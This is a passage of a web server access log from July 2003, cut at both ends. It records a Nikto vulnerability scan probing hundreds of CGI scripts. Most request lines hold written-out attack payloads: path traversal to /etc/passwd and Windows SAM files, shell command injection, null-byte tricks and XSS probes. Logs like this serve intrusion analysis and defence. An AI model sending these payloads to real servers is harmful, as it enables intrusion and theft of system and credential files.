/cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd| HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:04 +0900] "GET /cgi.cgi/guestbook.pl HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:04 +0900] "GET /cgi-bin/guestbook.pl HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:05 +0900] "GET /cgi.cgi/guestbook/passwd HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:06 +0900] "GET /cgi-bin/guestbook/passwd HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:07 +0900] "GET /cgi.cgi/handler.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:07 +0900] "GET /cgi-bin/handler.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:08 +0900] "GET /cgi.cgi/hitview.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:09 +0900] "GET /cgi-bin/hitview.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:09 +0900] "GET /cgi.cgi/hpnst.exe?c=p+i=SrvSystemInfo.html HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:10 +0900] "GET /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:11 +0900] "GET /cgi.cgi/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:12 +0900] "GET /cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:12 +0900] "GET /cgi.cgi/htgrep?file=index.html&hdr=/etc/passwd HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:13 +0900] "GET /cgi-bin/htgrep?file=index.html&hdr=/etc/passwd HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:14 +0900] "GET /cgi.cgi/htimage.exe HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:15 +0900] "GET /cgi-bin/htimage.exe HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:15 +0900] "GET /cgi.cgi/htmlscript?../../../../../../../../../../etc/passwd HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:16 +0900] "GET /cgi-bin/htmlscript?../../../../../../../../../../etc/passwd HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:17 +0900] "GET /cgi.cgi/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:17 +0900] "GET /cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:18 +0900] "GET /cgi.cgi/htsearch?-c/nonexistant HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:19 +0900] "GET /cgi-bin/htsearch?-c/nonexistant HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:20 +0900] "GET /cgi.cgi/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:20 +0900] "GET /cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:21 +0900] "GET /cgi.cgi/htsearch?exclude=%60/etc/passwd%60 HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:22 +0900] "GET /cgi-bin/htsearch?exclude=%60/etc/passwd%60 HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:22 +0900] "GET /cgi.cgi/ibill.pm HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:23 +0900] "GET /cgi-bin/ibill.pm HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:24 +0900] "GET /cgi.cgi/icat HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:25 +0900] "GET /cgi-bin/icat HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:25 +0900] "GET /cgi.cgi/ikonboard/help.cgi? HTTP/1.0" 403 302 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:26 +0900] "GET /cgi-bin/ikonboard/help.cgi? HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:27 +0900] "GET /cgi.cgi/ImageFolio/admin/admin.cgi HTTP/1.0" 403 310 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:27 +0900] "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0" 404 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:28 +0900] "GET /cgi.cgi/inc/sendmail.inc HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:29 +0900] "GET /cgi-bin/inc/sendmail.inc HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:30 +0900] "GET /cgi.cgi/index.pl HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:30 +0900] "GET /cgi-bin/index.pl HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:31 +0900] "GET /cgi.cgi/index.pl HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:32 +0900] "GET /cgi-bin/index.pl HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:32 +0900] "GET /cgi.cgi/index.pl HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:33 +0900] "GET /cgi-bin/index.pl HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:34 +0900] "GET /cgi.cgi/info2www '(../../../../../../../bin/mail root </etc/passwd> HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:53:34 +0900] "GET /cgi-bin/info2www '(../../../../../../../bin/mail root </etc/passwd> HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:53:35 +0900] "GET /cgi.cgi/info2www HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:36 +0900] "GET /cgi-bin/info2www HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:37 +0900] "GET /cgi.cgi/infosrch.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:37 +0900] "GET /cgi-bin/infosrch.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:38 +0900] "GET /cgi.cgi/ion-p.exe?page=c:\\winnt\\repair\\sam HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:39 +0900] "GET /cgi-bin/ion-p.exe?page=c:\\winnt\\repair\\sam HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:39 +0900] "GET /cgi.cgi/ion-p?page=../../../../../etc/passwd HTTP/1.0" 403 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:40 +0900] "GET /cgi-bin/ion-p?page=../../../../../etc/passwd HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:41 +0900] "GET /cgi.cgi/jj HTTP/1.0" 403 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:42 +0900] "GET /cgi-bin/jj HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:42 +0900] "GET /cgi.cgi/journal.cgi?folder=journal.cgi%00 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:43 +0900] "GET /cgi-bin/journal.cgi?folder=journal.cgi%00 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:44 +0900] "GET /cgi.cgi/ksh HTTP/1.0" 403 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:44 +0900] "GET /cgi-bin/ksh HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:45 +0900] "POST /cgi.cgi/lastlines.cgi?process HTTP/1.0" 403 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:46 +0900] "POST /cgi-bin/lastlines.cgi?process HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:47 +0900] "GET /cgi.cgi/listrec.pl HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:47 +0900] "GET /cgi-bin/listrec.pl HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:48 +0900] "GET /cgi.cgi/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:49 +0900] "GET /cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:49 +0900] "GET /cgi.cgi/loadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:50 +0900] "GET /cgi-bin/loadpage.cgi?user_id=1&file=..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt\\\\win.ini HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:51 +0900] "GET /cgi.cgi/log-reader.cgi HTTP/1.0" 403 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:52 +0900] "GET /cgi-bin/log-reader.cgi HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:52 +0900] "GET /cgi.cgi/log/ HTTP/1.0" 403 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:53 +0900] "GET /cgi-bin/log/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:54 +0900] "GET /cgi.cgi/log/nether-log.pl?checkit HTTP/1.0" 403 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:54 +0900] "GET /cgi-bin/log/nether-log.pl?checkit HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:55 +0900] "GET /cgi.cgi/login.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:56 +0900] "GET /cgi-bin/login.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:57 +0900] "GET /cgi.cgi/login.pl HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:57 +0900] "GET /cgi-bin/login.pl HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:58 +0900] "GET /cgi.cgi/login.pl?course_id=\\\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:59 +0900] "GET /cgi-bin/login.pl?course_id=\\\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt; HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:53:59 +0900] "GET /cgi.cgi/logit.cgi HTTP/1.0" 403 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:00 +0900] "GET /cgi-bin/logit.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:01 +0900] "GET /cgi.cgi/logs.pl HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:02 +0900] "GET /cgi-bin/logs.pl HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:02 +0900] "GET /cgi.cgi/logs/ HTTP/1.0" 403 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:03 +0900] "GET /cgi-bin/logs/ HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:04 +0900] "GET /cgi.cgi/logs/access_log HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:04 +0900] "GET /cgi-bin/logs/access_log HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:05 +0900] "GET /cgi.cgi/lookwho.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:06 +0900] "GET /cgi-bin/lookwho.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:07 +0900] "GET /cgi.cgi/LWGate HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:07 +0900] "GET /cgi-bin/LWGate HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:08 +0900] "GET /cgi.cgi/lwgate HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:09 +0900] "GET /cgi-bin/lwgate HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:09 +0900] "GET /cgi.cgi/LWGate.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:10 +0900] "GET /cgi-bin/LWGate.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:11 +0900] "GET /cgi.cgi/lwgate.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:12 +0900] "GET /cgi-bin/lwgate.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:12 +0900] "GET /cgi.cgi/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 403 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:13 +0900] "GET /cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:14 +0900] "GET /cgi.cgi/maillist.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:14 +0900] "GET /cgi-bin/maillist.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:15 +0900] "GET /cgi.cgi/maillist.pl HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:16 +0900] "GET /cgi-bin/maillist.pl HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:17 +0900] "GET /cgi.cgi/mailnews.cgi HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:17 +0900] "GET /cgi-bin/mailnews.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:18 +0900] "GET /cgi.cgi/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:19 +0900] "GET /cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:20 +0900] "GET /cgi.cgi/majordomo.pl HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:20 +0900] "GET /cgi-bin/majordomo.pl HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:21 +0900] "GET /cgi.cgi/man.sh HTTP/1.0" 403 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:22 +0900] "GET /cgi-bin/man.sh HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:22 +0900] "GET /cgi.cgi/meta.pl HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:23 +0900] "GET /cgi-bin/meta.pl HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:24 +0900] "GET /cgi.cgi/mgrqcgi HTTP/1.0" 403 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:25 +0900] "GET /cgi-bin/mgrqcgi HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:25 +0900] "GET /cgi.cgi/minimal.exe HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:26 +0900] "GET /cgi-bin/minimal.exe HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:27 +0900] "GET /cgi.cgi/mini_logger.cgi HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:27 +0900] "GET /cgi-bin/mini_logger.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:28 +0900] "GET /cgi.cgi/mkilog.exe HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:29 +0900] "GET /cgi-bin/mkilog.exe HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:30 +0900] "GET /cgi.cgi/mkplog.exe HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:30 +0900] "GET /cgi-bin/mkplog.exe HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:31 +0900] "GET /cgi.cgi/mmstdod.cgi HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:32 +0900] "GET /cgi-bin/mmstdod.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:32 +0900] "GET /cgi.cgi/mrtg.cfg?cfg=../../../../../../../../etc/passwd HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:33 +0900] "GET /cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:34 +0900] "GET /cgi.cgi/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:35 +0900] "GET /cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:35 +0900] "GET /cgi.cgi/mrtg.cgi?cfg=blah HTTP/1.0" 403 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:36 +0900] "GET /cgi-bin/mrtg.cgi?cfg=blah HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:37 +0900] "GET /cgi.cgi/MsmMask.exe?mask=/junk334 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:37 +0900] "GET /cgi-bin/MsmMask.exe?mask=/junk334 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:38 +0900] "GET /cgi.cgi/MsmMask.exe?mask=/junk334 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:39 +0900] "GET /cgi-bin/MsmMask.exe?mask=/junk334 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:40 +0900] "GET /cgi.cgi/MsmMask.exe?mask=/junk334 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:40 +0900] "GET /cgi-bin/MsmMask.exe?mask=/junk334 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:41 +0900] "GET /cgi.cgi/MsmMask.exe?mask=/junk334 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:42 +0900] "GET /cgi-bin/MsmMask.exe?mask=/junk334 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:42 +0900] "GET /cgi.cgi/MsmMask.exe?mask=/junk334 HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:43 +0900] "GET /cgi-bin/MsmMask.exe?mask=/junk334 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:44 +0900] "GET /cgi.cgi/multihtml.pl?multi=/etc/passwd%00html HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:45 +0900] "GET /cgi-bin/multihtml.pl?multi=/etc/passwd%00html HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:45 +0900] "GET /cgi.cgi/myguestbook.cgi?action=view HTTP/1.0" 403 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:46 +0900] "GET /cgi-bin/myguestbook.cgi?action=view HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:47 +0900] "GET /cgi.cgi/ncommerce3/ExecMacro/macro.d2w/%0a%0a HTTP/1.0" 403 317 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:47 +0900] "GET /cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a HTTP/1.0" 404 313 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:48 +0900] "GET /cgi.cgi/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK HTTP/1.0" 403 334 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:49 +0900] "GET /cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK HTTP/1.0" 404 330 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:50 +0900] "GET /cgi.cgi/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0" 403 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:50 +0900] "GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:51 +0900] "GET /cgi.cgi/netpad.cgi HTTP/1.0" 403 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:52 +0900] "GET /cgi-bin/netpad.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:53 +0900] "GET /cgi.cgi/newsdesk.cgi?t=../../../../../../../../../../etc/passwd HTTP/1.0" 403 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:54:53 +0900] "GET 